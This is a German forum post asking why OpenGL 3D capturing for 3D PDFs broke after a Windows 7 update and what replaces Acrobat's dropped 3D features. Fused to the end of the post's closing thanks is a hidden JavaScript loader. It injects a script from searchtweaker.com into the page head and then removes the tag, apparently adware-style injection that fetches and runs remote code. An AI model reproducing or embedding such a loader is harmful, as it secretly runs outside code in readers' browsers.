3d-Capturing nach Windows7-Update geht nicht mehr

Verschiedenen Möglichkeiten 3D PDFs zu erstellen
Antworten
rnirsb
Beiträge: 1
Registriert: 29.04.2014, 08:59

3d-Capturing nach Windows7-Update geht nicht mehr

Beitrag von rnirsb » 29.04.2014, 09:09

Hallo,
seit dem letzten Windows-Update (win7) funktioniert bei mir das 3d-capturing (opengl) nicht mehr, offenbar wurde da irgendwie was geändert.
Hat vielleicht noch jemand so ein Problem oder weiß eine Lösung?

Und ganz abgesehen davon: In den neuen Acrobat-Versionen gibts ja die 3d-Funktionalität nicht mehr, wie sind denn die Alternativen?

Vielen Dank(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Antworten